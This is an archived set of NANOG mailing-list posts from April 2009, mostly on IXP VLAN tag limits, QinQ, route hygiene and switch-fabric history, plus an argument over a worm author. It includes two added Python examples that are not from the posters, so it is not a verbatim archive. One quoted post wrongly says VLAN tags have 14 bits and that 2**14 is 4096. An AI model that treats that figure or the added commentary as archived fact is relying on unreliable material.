 I want this individual made an example of and im not joking.

>>>
>>> And I'd like an example made of companies that ignore reports of security
>>> flaws and leave their customers open to such worms; not to mention giving
>>> the impression to misguided teenagers that the only way they will be
>>> heard
>>> is to release a worm.
>>>
>>> Historically, I believe some companies have ignored security concerns
>>> until
>>> someone (sometimes non-maliciously) released a worm. Of course, even
>>> non-malicious worms can have unpredictable results which result in
>>> catastrophic behavior. The earliest examples predate my residence on the
>>> network, but I've read a small bug made them extremely bad.
>>>
>>> Jack
>>>
>>>
>>
>>
>>
>> Sent via BlackBerry from T-Mobile
>
>



Re: IXP

2009-04-17 Thread Matthew Moyle-Croft



Arnold Nipper wrote:

> On 17.04.2009 20:52 Paul Vixie wrote
>
> Large IXP have >300 customers. You would need up to 45k vlan tags,
> wouldn't you?

Not agreeing or disagreeing with this as a concept, but I'd imagine that 
since a number of vendors support arbitrary VLAN rewrite on ports, in a 
simple environment you could do some evil things with that (i.e. you 
could use QinQ "like" ATM Virtual Paths between core switches and then 
reuse the VLAN tag as a VC). Then, as long as no peer has more than 4096 
peers you're sweet. It'd hurt your head and probably never work, but 
heck, there's a concept to argue about. (Please note: I don't endorse 
this as an idea.)


I guess the other option is to use MPLS xconnect style or, heck, most 
vendors have gear that'll allow you to do Layer 3 at the same speed as 
Layer 2, so you could go for routing everyone to a common routing core 
with either EBGP multihop or MLPA with communities to control route 
entry and exit.  Then broadcast isn't an issue and multicast would kind 
of be okay.  (Please note: I don't endorse this as an idea).


None of these options, to be honest, are nice and all more complex than 
just a Layer2 network with some protocol filtering and rate limiting at 
the edge.  So, it's not clear what more complex arrangements would fix.


My feeling is that IXes are just a substitute for PNIs anyway, so 
peering does naturally migrate that way as the flows get larger. If 
you're an IX as a business then this may affront you, but most 
IXes-as-a-business are colo people (e.g. S&D, Equinix) who make good 
money on xconnects anyway. Or you have a business model that means you 
accept this happens. Clearly, given the number of 10Gbps ports on some 
exchanges it's not that much of an issue.


MMC



RE: IXP

2009-04-17 Thread Deepak Jain
> Not agreeing or disagreeing with this as a concept, but I'd imagine
> that
> since a number of vendors support arbitrary vlan rewrite on ports that
> in simple environment you could do some evil things with that.  (ie.
> you could use QinQ "like" ATM Virtual Paths between core switches and
> then reuse the VLAN tag as a VC).  Then, as long as no peer has more
> than 4096 peers you're sweet. It'd hurt your head and probably never
> work, but heck, there's a concept to argue about.  (Please note: I
> don't
> endorse this as an idea).
> 

This would be best managed by a very smart, but very simple, piece of software.

Just like Facebook or LinkedIn, or what-have-you, a network accepts a "peer/friend"
request from another network. Once both sides agree (and only as long as both sides
agree) the configuration is pinned up. Either side can pull it down. The configs, up
to the hardware limits, would be pretty trivial, especially QinQ management for VLAN ID
uniqueness.

Not sure how switches handle HOL blocking with QinQ traffic across trunks, but hey...
what's the fun of running an IXP without testing some limits?

Deepak Jain
AiNET







Re: IXP

2009-04-17 Thread Nathan Ward


On 18/04/2009, at 12:08 PM, Paul Vixie wrote:

> i should answer something said earlier: yes there's only 14 bits of tag and
> yes 2**14 is 4096.  in the sparsest and most wasteful allocation scheme,
> tags would be assigned 7:7 so there'd be a max of 64 peers.  it's more
> likely that tags would be assigned by increment, but it's still nowhere
> near enough for 300+ peers.  however, well before 300 peers, there'd be
> enough staff and enough money to use something other than a switch in the
> middle, so that the "tagspace" would be per-port rather than global to the
> IXP.  Q in Q is not how i'd build this... cisco and juniper both have
> hardware tunnelling capabilities that support this stuff...  it just means
> as the IXP fabric grows it has to become router-based.



On Alcatel-Lucent 7x50 gear, VLAN IDs are only relevant to that local  
port. If you want to build a "VLAN" that operates like it does on a  
Cisco switch or something, you set up a tag on each port, and join the  
tags together with a L2 switching service. The tag IDs can be  
different on each port, or the same... it has no impact.


--
Nathan Ward
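Worked example, added here and not from any of the posters in this thread, putting numbers on the tag-space argument: a full mesh of point-to-point peering VLANs needs n(n-1)/2 fabric-wide tags (300 peers gives 44,850, the "45k" Arnold Nipper quotes), the IEEE 802.1Q VLAN identifier is 12 bits of the TCI with VIDs 1 to 4094 assignable, and if tags are only significant on the port they enter, as Nathan Ward describes for the 7x50, each port needs just n-1. The second half is a hypothetical allocator in the "peer/friend request" style Deepak Jain sketches: a VLAN is pinned up only while both sides have an outstanding request and either side can tear it down. Port names use documentation ASNs (AS64496 and up) as placeholders; none of this is any vendor's or IXP's software.

```python
"""Tag arithmetic for point-to-point peering VLANs on an IXP fabric, plus a
mutual-consent allocator that pins a VLAN up only while both peers want it."""

VID_BITS = 12                       # IEEE 802.1Q VLAN identifier: 12 bits of the TCI
USABLE_VIDS = (1 << VID_BITS) - 2   # VID 0 (priority-tagged) and 4095 are reserved: 1..4094


def global_tags_for_full_mesh(peers: int) -> int:
    """One fabric-wide tag per peer pair: n(n-1)/2."""
    return peers * (peers - 1) // 2


def per_port_tags(peers: int) -> int:
    """If a tag only has to be unique on the port it enters, each port needs n-1."""
    return peers - 1


def fits_global_tagspace(peers: int) -> bool:
    return global_tags_for_full_mesh(peers) <= USABLE_VIDS


def max_peers_global_mesh() -> int:
    """Largest full mesh a single fabric-wide 12-bit tag space can carry."""
    n = 2
    while fits_global_tagspace(n + 1):
        n += 1
    return n


class PeeringFabric:
    """Pseudo-wire style peering with per-port tag significance (hypothetical model).

    A VLAN between A and B exists only while both A and B have requested it;
    either side can withdraw and the VLAN disappears. Each port gets its own
    1..4094 space, so the fabric as a whole is limited by ports, not by pairs."""

    def __init__(self):
        self.requests = set()   # directed (requester, target) pairs
        self.vlans = {}         # frozenset({a, b}) -> {a: vid_on_a, b: vid_on_b}

    def _free_vid(self, port: str) -> int:
        used = {tags[port] for tags in self.vlans.values() if port in tags}
        for vid in range(1, USABLE_VIDS + 1):
            if vid not in used:
                return vid
        raise RuntimeError(f"port {port} has exhausted its 802.1Q tag space")

    def request(self, requester: str, target: str) -> bool:
        """Record a request; pin the VLAN up once both directions exist."""
        if requester == target:
            raise ValueError("a port cannot peer with itself")
        self.requests.add((requester, target))
        key = frozenset((requester, target))
        if (target, requester) in self.requests and key not in self.vlans:
            self.vlans[key] = {requester: self._free_vid(requester),
                               target: self._free_vid(target)}
        return key in self.vlans

    def withdraw(self, requester: str, target: str) -> None:
        """Either side can tear the VLAN down unilaterally."""
        self.requests.discard((requester, target))
        self.vlans.pop(frozenset((requester, target)), None)

    def port_tags(self, port: str) -> dict:
        """The tag -> neighbour map that would be pushed to one port's config."""
        out = {}
        for key, tags in self.vlans.items():
            if port in tags:
                (other,) = key - {port}
                out[tags[port]] = other
        return out


if __name__ == "__main__":
    print("300-peer full mesh, global tags:", global_tags_for_full_mesh(300),
          "fits:", fits_global_tagspace(300), "per port:", per_port_tags(300))
    fabric = PeeringFabric()
    fabric.request("AS64496", "AS64497")            # one side only: nothing pinned up
    fabric.request("AS64497", "AS64496")            # both agree: VLAN exists
    print(fabric.port_tags("AS64496"), fabric.port_tags("AS64497"))
```

The allocator keeps the two tag numbers of one VLAN independent, which is the property that makes the per-port model scale: the pair (AS64496, AS64497) can be VID 1 on one port and VID 7 on the other, and a withdrawal frees only the VIDs on the two ports involved.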




Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread Randy Bush
> So if Al-Qaeda blow up a shopping centre and the guy who masterminded
> it turns out to be 17 he gets a job in MI5?

what is more fun than a net vigilante?  a ranting and raving hyperbolic
net vigilante.



Re: Michael Mooney releases another worm: Law Enforcement / Intelligence Agency's do nothing

2009-04-17 Thread Cord MacLeod

You are exactly right Randy.

from: Randy Bush
to: Franck Martin
cc: 74attend...@ietf.org
date: Wed, Mar 18, 2009 at 4:47 PM
subject: Re: [74attendees] IETF attendee from Italy or Hong Kong -- visa issue



> Yes Stockholm is first but as it seemed to be an issue with Asia going
> to the USA, Hiroshima is likely the meeting that most Asians will be
> able to attend with fewer visa problems?

i am not sure about north koreans, but i am not aware that there would
be problems for others.  but i am not sure.

and in many venues there are also significant problems with various
middle-eastern, north african, and gulf countries.  this is aside from
the israelis keeping the palestinians imprisoned in their own country.


On Apr 17, 2009, at 9:56 PM, Randy Bush wrote:

>> So if Al-Qaeda blow up a shopping centre and the guy who masterminded
>> it turns out to be 17 he gets a job in MI5?
>
> what is more fun than a net vigilante?  a ranting and raving hyperbolic
> net vigilante.






Re: IXP

2009-04-17 Thread Stephen Stuart
> Not sure how switches handle HOL blocking with QinQ traffic across trunks,
> but hey...
> what's the fun of running an IXP without testing some limits?

Indeed. Those with longer memories will remember that I used to
regularly apologize at NANOG meetings for the DEC Gigaswitch/FDDI
head-of-line blocking that all Gigaswitch-based IXPs experienced when
some critical mass of OC3 backbone circuits was reached and the 100
MB/s fabric rolled over and died, offered here (again) as a cautionary
tale for those who want to test those particular limits (again).

At PAIX, when we "upgraded" to the Gigaswitch/FDDI (from a DELNI; we
loved the DELNI), I actually used a feature of the switch that you
could "black out" certain sections of the crossbar to prevent packets
arriving on one port from exiting certain others at the request of
some networks to align L2 connectivity with their peering
agreements. It was fortunate that the scaling meltdown occurred when
it did, otherwise I would have spent more software development
resources trying to turn that capability into something that was
operationally sustainable for networks to configure the visibility of
their port to only those networks with which they had peering
agreements. That software would probably have been thrown away with
the Gigaswitches had it actually been developed, and rewritten to use
something horrendous like MAC-based filtering, and if I recall
correctly the options didn't look feasible at the time - and who wants
to have to talk to a portal when doing a 2am emergency replacement of
a linecard to change registered MAC addresses, anyway? The port-based
stuff had a chance of being operationally feasible.

The notion of a partial pseudo-wire mesh, with a self-service portal
to request/accept connections like the MAEs had for their ATM-based
fabrics, follows pretty well from that and everything that's been
learned by anyone about advancing the state of the art, and extends
well to allow an IXP to have a distributed fabric benefit from
scalable L2.5/L3 traffic management features while looking as much
like wires to the networks using the IXP.

If the gear currently deployed in IXP interconnection fabrics actually
supports the necessary features, maybe someone will be brave enough to
commit the software development resources necessary to try to make it
an operational reality. If it requires capital investment, though, I
suspect it'll be a while.

The real lesson from the last fifteen or so years, though, is that
bear skins and stone knives clearly have a long operational lifetime.

Stephen



Re: IXP

2009-04-17 Thread Gaurab Raj Upadhaya
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Elmar K. Bins wrote:

> I am not an IXP operator, but I know of no exchange (public or
> private, big or closet-style) that uses private ASNs or RFC1918
> space.

I know of at least two IXPs where RFC 1918 space is used on the IXP
Subnet. I know a fair number of IXPs where providers use Private ASNs
even for longish durations. I also know of a lot of IXPs where IPv4
prefixes longer then /24s are visible.

But, as others have said, in most cases these measures are temporary in
nature and eventually everyone will migrate.

thanks
 -gaurab
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (Darwin)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAknpajwACgkQSo7fU26F3X1/KgCg8P6or9LD7kldigNW38OhJ5eF
r9wAnRtbbGel2JZVFRJ0xqLbcxWUeBUQ
=dVae
-END PGP SIGNATURE-
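Added example, not from Gaurab's post or any IXP's route server: a small audit of routes learned over an IXP session for the three things he mentions, RFC 1918 (and other unroutable) space, private ASNs in the AS path, and prefixes longer than /24. The /24 and /48 cut-offs are assumed local policy rather than a standard, the reserved-space list is RFC 1918 plus the well-known loopback, link-local, shared-address, multicast and class E blocks, and the sample routes are constructed from documentation prefixes and ASNs.

```python
"""Route hygiene for prefixes learned across an IXP: flag reserved/unroutable space,
private ASNs (RFC 6996) anywhere in the AS path, and overly long prefixes."""
import ipaddress

PRIVATE_ASN_RANGES = ((64512, 65534), (4200000000, 4294967294))   # RFC 6996
RESERVED = [ipaddress.ip_network(p) for p in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "0.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",      # "this" network, loopback, link-local
    "100.64.0.0/10", "224.0.0.0/4", "240.0.0.0/4",     # shared address space, multicast, class E
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]
MAX_LEN = {4: 24, 6: 48}   # assumption: local policy for the longest accepted prefix


def is_private_asn(asn: int) -> bool:
    return any(lo <= asn <= hi for lo, hi in PRIVATE_ASN_RANGES)


def check_route(prefix: str, as_path: list, max_len: dict = MAX_LEN) -> list:
    """Return a list of human-readable problems with one route (empty if clean)."""
    net = ipaddress.ip_network(prefix, strict=False)
    issues = []
    for r in RESERVED:
        # A route is bad both if it sits inside reserved space and if it covers it.
        if r.version == net.version and (net.subnet_of(r) or r.subnet_of(net)):
            issues.append(f"overlaps reserved {r}")
    if net.prefixlen > max_len[net.version]:
        issues.append(f"prefix longer than /{max_len[net.version]}")
    private = [a for a in as_path if is_private_asn(a)]
    if private:
        issues.append("private ASN in path: " + ",".join(map(str, private)))
    return issues


def audit(routes) -> dict:
    """routes: iterable of (prefix, as_path). Returns {prefix: [issues]} for bad routes."""
    report = {}
    for prefix, path in routes:
        issues = check_route(prefix, path)
        if issues:
            report[prefix] = issues
    return report


# Constructed sample (documentation prefixes and ASNs, not anything seen on a real IXP).
SAMPLE_ROUTES = [
    ("192.168.10.0/24", [64512, 65001]),        # RFC 1918 space via private ASNs
    ("198.51.100.0/25", [64496, 64497]),        # longer than /24
    ("2001:db8:1234::/48", [64496]),            # clean
    ("203.0.113.0/24", [64496, 4200000001]),    # 4-byte private ASN in the path
    ("fd00:1::/48", [64496]),                   # IPv6 unique local space
]

if __name__ == "__main__":
    for prefix, issues in audit(SAMPLE_ROUTES).items():
        print(prefix, "->", "; ".join(issues))
```

Checks like these belong on the receiving side of every IXP session, not just on route servers: a private ASN that a peer left in the path is stripped or rejected depending on policy, but RFC 1918 space or a /25 leaking across the fabric is something to reject and then report, since "temporary" arrangements of the kind Gaurab describes have a way of outliving the people who set them up.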



RE: Michael Mooney releases another worm: Law Enforcement /Intelligence Agency's do nothing

2009-04-17 Thread Jo¢

Pardon the ignorance

I have to take this a step back. Your neighbor leaves their window open with
a fresh bowl of fish near the window. A bunch of cats show up and start
trying to get in; to no avail do they get in. At the first chance you
discuss this with your neighbor, and warn them of this situation. The
following day the neighbor does the same thing, window open, fresh bowl of
fish. Do you
A: sit back and say "Told you so".
B: swat the cats away and guard the window.
C: kill all the cats in the area.
D: hire the cats to find another open window.

I know this sounds silly, but to simplify things, if you

A: Sit back and watch the whole mess, you're now an accessory (Yeah, I
watched 'em).
B: Neighbor says "Hey, I wanted to take pictures of those cats and you shooed
them away!"
C: Vigilante style, kill all the cats. Closing a window is just too much.
D: Hire cats? Perhaps another EDS commercial.

If there's a genuine exploit that one has been made aware of, and there is no
preventive action taken, then I think we all know the outcome. If there's a
sudden exploit that runs rampant that you haven't been aware of, then lots of
time is spent researching it. Locking up all the "bad guys" will not solve the
shortcomings of security in applications.


But just my 2¢s
- Joe Blanchard

 

> -Original Message-
> From: Randy Bush [mailto:ra...@psg.com] 
> Sent: Saturday, April 18, 2009 12:56 AM
> To: andrew.wallace
> Cc: n3td3v; nanog@nanog.org
> Subject: Re: Michael Mooney releases another worm: Law 
> Enforcement /Intelligence Agency's do nothing
> 
> > So if Al-Qaeda blow up a shopping centre and the guy who 
> masterminded 
> > it turns out to be 17 he gets a job in MI5?
> 
> what is more fun than a net vigilante?  a ranting and raving 
> hyperbolic net vigilante.
>